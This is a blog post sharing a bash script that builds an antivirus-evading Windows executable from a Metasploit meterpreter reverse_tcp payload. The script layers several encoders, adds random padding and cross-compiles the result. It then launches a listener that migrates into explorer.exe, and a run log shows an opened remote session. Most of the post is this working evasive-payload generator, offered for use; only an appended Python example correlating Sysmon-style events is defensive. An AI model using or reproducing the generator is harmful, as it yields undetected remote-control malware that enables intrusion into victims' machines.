
Friday, June 22, 2012

FUD Payload Generator for Backtrack


Today, based on Astr0baby's article on how we can create a fully undetectable Metasploit payload, I modified his REVERSE_TCP Payload Generator in order to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation of how it works:
Code:
#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
rm -rf ShellCode
 
echo "Here is a network device list available on your machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IP="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
 
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E
To compile the generated payload, we must install the following packages:
Code:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we must move our shell script to Metasploit's default folder (/pentest/exploits/framework) and execute it:
Code:
root@bt:/pentest/exploits/framework# chmod +x fud.sh 
root@bt:/pentest/exploits/framework# ./fud.sh 
************************************************************
    Automatic  shellcode generator - FOR METASPLOIT         
                  By Astr0baby 2011                        
  With some Randomic gravy and sauce to bypass Antivirus    
    For Automatic Teensy programming and deployment         
************************************************************
Here is a network device list available on yor machine
 lo:
 eth0:
What network interface are we gonna use ?  eth0
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 6000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
 
20210.exe ...generated in ShellCode subfolder
20210.exe sha1checksum is .. c69699927e61dbef37423c852cebcd40f883df2b 20210.exe
      starting the meterpreter listener...
Now that we have created our payload, we check whether it works:
Code:
root@bt:/pentest/exploits/framework/ShellCode# wine 24382.exe 
fixme:system:SetProcessDPIAware stub!
fixme:dwmapi:DwmIsCompositionEnabled 0x33cfdc
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\xpti.dat" 1 536870916 (nil) (nil) 0x1b3d42c (nil)
fixme:iphlpapi:NotifyAddrChange (Handle 0xa62e8d8, overlapped 0xa62e8e0): stub
fixme:file:MoveFileWithProgressW MOVEFILE_WRITE_THROUGH unimplemented
fixme:advapi:SetNamedSecurityInfoW L"C:\\windows\\system32\\gecko\\1.0.0\\wine_gecko\\components\\compreg.dat" 1 536870916 (nil) (nil) 0x1c18b0c (nil)
wine: configuration in '/root/.wine' has been updated.
fixme:toolhelp:CreateToolhelp32Snapshot Unimplemented: heap list snapshot
fixme:toolhelp:Heap32ListFirst : stub
Code:
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
AutoRunScript => migrate2 explorer.exe
[*] Started reverse handler on 192.168.200.22:443 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.200.22
[*] Meterpreter session 1 opened (192.168.200.22:443 -> 192.168.200.22:55865) at 2011-11-09 22:48:24 +0200
 
meterpreter > ps
 
Process list
============
 
 PID  Name            Arch  Session  User                      Path
 ---  ----            ----  -------  ----                      ----
 12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
 17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
 33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
 8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe
 
meterpreter > sysinfo
Computer        : bt
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Now our payload is fully undetectable by most antivirus engines. Of course, we can also scan it with online services such as NoVirusThanks.
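The listener transcript above also shows what the encoding chain leaves untouched: a freshly written executable with a `$RANDOM`-style numeric name connects out to port 443, and the AutoRunScript then migrates into explorer.exe. As an added defender-side example (not part of the original post or Astr0baby's script), the Python below correlates constructed Sysmon-style endpoint events (Event IDs 1 ProcessCreate, 3 NetworkConnect and 10 ProcessAccess, with simplified field names) into one alert for a process that shows that sequence. The iexplore.exe events, the browser allowlist and the GrantedAccess value are assumptions made for the sample; the 24382.exe path, the 192.168.200.22:443 destination and explorer.exe PID 17 are taken from the post's output.

```python
"""Behavioural correlation over constructed Sysmon-style events.

Added example, not part of the original post. Encoders change the bytes on
disk; the process/network/injection sequence the post's listener output
shows is still visible on the endpoint, and that is what this correlates.
"""
import re
from collections import defaultdict

# The generator names its output "$RANDOM.exe", i.e. 1-5 decimal digits.
RANDOM_NAME = re.compile(r"(?:^|\\)\d{1,5}\.exe$", re.IGNORECASE)
# Assumed allowlist of images expected to talk to 443 on this host.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
# Processes whose handles a fresh executable has little reason to open.
MIGRATION_TARGETS = {"explorer.exe"}
ALERT_THRESHOLD = 2  # at least two independent behaviours per process

# Constructed sample events (simplified Sysmon fields, values not captured).
SAMPLE_EVENTS = [
    {"id": 1, "pid": 8, "image": r"Z:\pentest\exploits\framework\ShellCode\24382.exe",
     "parent": r"C:\windows\explorer.exe"},
    {"id": 1, "pid": 41, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "parent": r"C:\windows\explorer.exe"},
    {"id": 3, "pid": 41, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443},
    {"id": 3, "pid": 8, "image": r"Z:\pentest\exploits\framework\ShellCode\24382.exe",
     "dst_ip": "192.168.200.22", "dst_port": 443},
    {"id": 10, "source_pid": 8, "source_image": r"Z:\pentest\exploits\framework\ShellCode\24382.exe",
     "target_pid": 17, "target_image": r"C:\windows\system32\explorer.exe",
     "granted_access": "0x1F0FFF"},  # constructed; PROCESS_ALL_ACCESS-style mask
]


def basename(path):
    """Last component of a Windows path, lower-cased for comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Return one alert per process whose observed behaviours reach the threshold.

    Each alert is {"pid": int, "image": str, "reasons": [str, ...]}.
    """
    per_pid = defaultdict(lambda: {"image": None, "reasons": []})
    for ev in events:
        if ev["id"] == 1:  # ProcessCreate
            rec = per_pid[ev["pid"]]
            rec["image"] = ev["image"]
            if RANDOM_NAME.search(ev["image"]):
                rec["reasons"].append("numeric random executable name")
        elif ev["id"] == 3:  # NetworkConnect
            rec = per_pid[ev["pid"]]
            rec["image"] = rec["image"] or ev["image"]
            if ev["dst_port"] == 443 and basename(ev["image"]) not in BROWSERS:
                rec["reasons"].append(
                    f"non-browser outbound to {ev['dst_ip']}:{ev['dst_port']}")
        elif ev["id"] == 10:  # ProcessAccess (source opens a handle to target)
            rec = per_pid[ev["source_pid"]]
            rec["image"] = rec["image"] or ev["source_image"]
            target = basename(ev["target_image"])
            if target in MIGRATION_TARGETS:
                rec["reasons"].append(
                    f"opened handle to {target} (pid {ev['target_pid']})")
    alerts = []
    for pid, rec in sorted(per_pid.items()):
        if len(rec["reasons"]) >= ALERT_THRESHOLD:
            alerts.append({"pid": pid, "image": rec["image"], "reasons": rec["reasons"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']} image={alert['image']}")
        for reason in alert["reasons"]:
            print(f"  - {reason}")
```

Running the block prints one alert for PID 8 with all three reasons, while the assumed iexplore.exe connection to 443 produces none; a single weak signal (a numeric file name alone, or one 443 connection alone) stays below the threshold, which is the point of correlating the sequence rather than matching any one event.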
Credits go to Astr0baby